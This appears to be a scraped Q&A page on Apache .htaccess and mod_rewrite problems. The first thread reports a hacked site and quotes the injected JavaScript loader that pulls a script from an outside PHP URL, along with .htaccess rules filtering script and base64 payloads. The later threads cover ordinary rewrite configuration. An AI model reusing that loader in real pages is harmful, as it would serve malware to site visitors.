Yesterday someone attacked my sites.
I use my own CMS and I doubt that they have access to .Htaccess
I would like to know if my .Htaccess is protected.
Actually my js files was affected by this code:
/*df1e0b*/
/**/
document.write("<script type='text/javascript' src='http://audiorealestudio.com /fotosdiegoalejandro/VfTzdPj4.php'></"+ "script>");
/*/df1e0b*/
Also i find one php file on root rbKcy8Vj.php
This is my htaccess
# protect .htaccess
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# directory browsing
Options All -Indexes
<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<Files ~ ".(xml|css|jpe?g|png|gif|js)$">
Allow from all
</Files>
<Files config.php>
Order deny,allow
Deny from all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{REQUEST_URI} ^(.*)_vti(.*)$ [OR]
RewriteRule ^(.*)$ index.php [F,L]
RewriteRule ^contact/?$ contact.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^test/([0-9a-zA-Z-_]+)/?$ test.php?cat=$1 [QSA,L]
No actually your .htaccess doesnt seem to be protected. I have gone through almost the same earlier, and my .htaccess was compromised multiple times during that attack even if i set its permissions to 444.
Bonus: How to resolve this issues?
Alright I have faced this issue earlier with Joomla CMS, this usually happens when you don't update and 0-day exploits turn up or due to bad plugins. Based on your javascript code above it looks like a XSS exploit.
Now what has happened is that a PHP shell has been uploaded to your server via the script code executed, you need to first update your cms so that this exploit does not occur again. Clean all the files affected (remove weird code you end up seeing) there might be multiple files best way is to see the date modified. Also look through your folders for suspicious files, you can find them using date modified/created and the dates might be weird like in my case it was set was 1970 so I couldn't find it easily.
After you have removed the suspicious js code, weird php scripts and updated your cms then make sure your .htaccess is clean and its permissions are set as 444. Thats it, the attack wont happen again (unless you didnt update your cms)
Related
I have next .htaccess in root directory
RewriteEngine on
RewriteRule ^$ index.php [L]
Order Deny,Allow
Deny from all
<Files index.php>
Allow from all
</Files>
And get Page 403 Forbidden for www.example.com instead of www.example.com/index.php.
URL www.example.com/index.php is available.
Access to all files in the root directory is closed. These files are generated by scripts, the file names are unknown.
How to fix it?
<Files index.php>
Allow from all
</Files>
Try the following instead:
<FilesMatch "^(index\.php)?$">
Allow from all
</FilesMatch>
UPDATE: Added missed anchors!
(Although I would assume you are on Apache 2.4, so you should be using the corresponding Require directives instead of Order, Deny and Allow.)
Alternatively, replace all you existing directives with the following:
DirectoryIndex index.php
RewriteEngine On
RewriteRule !^(index\.php)?$ - [F]
This allows access to both example.com/ and example.com/index.php. To block direct access to index.php then try the following instead:
RewriteRule ^[^/]+$ - [F]
mod_dir (ie. "DirectoryIndex") is processed after mod_rewrite.
RewriteRule ^$ index.php [L]
This rule is redundant, it should be handled by DirectoryIndex instead.
UPDATE:
RewriteRule !^(index.php)?$ - [F] works, but I add RewriteRule !^(index2.php)?$ - [F] for second file index2.php and It dont work... I am getting 403 error for www.example.com/index2.php... I need access to several files
By adding another rule it would end up blocking both URLs. Since one or other rule will always be successful.
You can use regex alternation in a single rule. For example:
RewriteRule !^(index\.php|index2\.php)?$ - [F]
The same regex could be used in the <FilesMatch> container above.
Or, if you have many such exceptions, it might be more readable to have multiple conditions. For example:
RewriteCond %{REQUEST_URI} !=index.php
RewriteCond %{REQUEST_URI} !=index2.php
RewriteCond %{REQUEST_URI} !=index3.php
RewriteRule !^$ - [F]
Note, however, like your original rule, this also blocks URLs in "subdirectories", not just the root directory.
Consider this .htaccess in the web root.
RewriteEngine on
RewriteBase /
RewriteRule "^pretty/(.*)" index.php?pretty=$1
Order Allow,Deny
Deny from all
<Files index.php>
Allow from all
</Files>
/pretty/sweet is correctly rewritten to /index.php?pretty=sweet (with the second half disabled).
However, I get a 403 Forbidden (with 2nd half enabled)
I assumed that URL substitution is applied first, and then <Files index.php> will match the substituted URL, allowing access.
What am I missing or misunderstanding here, and how do I fix this?
RewriteRule and Allow/Deny directives are from different Apache modules. Their loading order can be different from what you've in .htaccess.
I suggest you stick with mod_rewrite itself like this:
RewriteEngine on
RewriteBase /
RewriteRule ^pretty/(.*)$ index.php?pretty=$1 [L,QSA]
# block all files except some known files
RewriteCond %{REQUEST_URI} !(?:/|/index\.php|.+\.(?:js|css|jpe?g|png|gif))$ [NC]
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule ^ - [F]
There may be a fairly simple solution to this, but I've been searching for a couple of days and can't find one, soooo...
I'm developing a website on an OS X box (Lion). The working site is hosted at /Users/username/Sites and I've added that directory to /etc/apache2/users/username.conf. I can view the pages with no problems.
BUT... I'm using CodeIgniter and I want to remove the index.php from the URL. This should be a fairly simple job for mod_rewrite. I've added an .htaccess file to the directory (and set AllowOverride All in my conf file above). After googling around I discovered that I need Options +FollowSymLinks set (I did in the .htaccess file).
The problem with this is that it appears to rewrite the URL from localhost/~username/ to /Users/username/Sites. Problem with this is that, in that form, the browser simply attempts to DOWNLOAD the index.php file, rather than executing it. This gets worse when the links are /Users//Sites/index.php/controller/function because those files don't exist... CodeIgniter is meant to take over in the index.php, but only if it is executed.
So I can't remove the Options +FollowSymLinks because that generates Access Forbidden errors, and I can't leave it in for the reasons above.
Interestingly, putting exactly the same website to the /Library/WebServer/Documents directory works fine. OS X doesn't appear to mind FollowSymLinks to that directory, probably because it is set as the DocumentRoot in httpd.conf
My httpd.conf is stock Lion, except for AllowOverride All on /Library/Webserver/Documents. mod_rewrite is enabled.
My username.conf is
<Directory "/Users/username/Sites/">
Options Indexes MultiViews FollowSymLinks
AllowOverride All
Order allow,deny
Allow from all
</Directory>
My .htaccess file in the site's directory is
Options +FollowSymLinks
RewriteEngine on
RewriteCond $1 !^(index\.php|static|robots\.txt)
RewriteRule ^(.*)$ index.php/$1 [L]
Clearly, I can develop on /Library/WebServer/Documents, but would prefer to do it in my local files.
There is an excellent wiki page on the CodeIgniter website about mod rewrite, it covers all of the changes you need to make to your .htaccess file and the CodeIgniter files itself.
It is easy to forget changing values in your config file like the index_page from:
$config['index_page'] = "index.php";
to
$config['index_page'] = "";
The example .htaccess file shown on that wiki page is (I have removed the comments):
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} ^system.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
And if you find that you need to, just add the AddType and Options properties to it.
Here some of tricks may usefull
AddType application/x-httpd-php .php
Options +FollowSymLinks
RewriteEngine on
RewriteBase /Users/username/Sites/
RewriteEngine on
RewriteCond $1 !^(index\.php|static|robots\.txt)
RewriteRule ^(.*)$ index.php/$1 [L]
Also you can log rewriting log. But suggest you to remove these lines , after you fix everything
RewriteLog "/var/log/httpd/rewrite_log"
RewriteLogLevel 9
I am attempting to setup a webdav website for various clients to upload/download files. However I don't want each client to see the other clients' data. Each client uses SSL client certificates to authenticate, so I would like to chroot them into their own directory tree.
For example:
https://example.com/webdav/upload
Should map to filesystem location
/somewebroot/webdav/SSL_USERNAME/upload
I thought that I could use mod_rewrite for this but my rules seem to send me into an infinite redirection loop. Any thoughts?
Alias /webdav /somewebroot/webdav
<Directory /somewebroot/webdav>
RewriteEngine On
RewriteBase /webdav
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN} ADMIN #The admin does not get chrooted
RewriteRule .* - [L]
RewriteCond %{REQUEST_URI} !^%{SSL:SSL_CLIENT_S_DN_CN}/(.*)
RewriteRule ^(.*) %{SSL:SSL_CLIENT_S_DN_CN}/$1 [L]
</Directory>
The fix for this is fairly simple once you figure out that "RewriteCond" does not support server variables in the PATTERN. So you have to get it into the pattern by using a backreference. Also "RewriteCond" does not use the "RewriteBase" directive so you also have to take that into account as well.
Alias /webdav /somewebroot/webdav
<Directory /somewebroot/webdav>
RewriteEngine On
RewriteBase /webdav
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN} ADMIN #The admin does not get chrooted
RewriteRule .* - [L]
RewriteCond %{SSL:SSL_CLIENT_S_DN_CN}::%{REQUEST_URI} !^(.*)::/webdav/\1/(.*)
RewriteRule ^(.*) %{SSL:SSL_CLIENT_S_DN_CN}/$1 [L]
</Directory>
So if the user types mydomain.com/dashboard, the document the server actually sends them is /launch.php?i=/dashboard.
The one caveat is that I would like to leave requests for
/flags
/people
/posters
/css
/icons
/images
/libraries
/patterns
alone, and they should request the actual folder.
How would I create such a mod_rewrite?
This is the .htaccess file for the CakePHP Framework.
Please replace the index.php and ?url= to fit your needs.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?url=$1 [QSA,L]
</IfModule>
The "!-d" tells Apache to follow existing folders and "!-f" to follow existing files.
Everything else is channelled through index.php
As suggested in a comment, you have to be aware that if it's not working it could be because mod_rewrite is not enabled and you'll not get an error stating that fact, you'll probably only have a HTTP 404.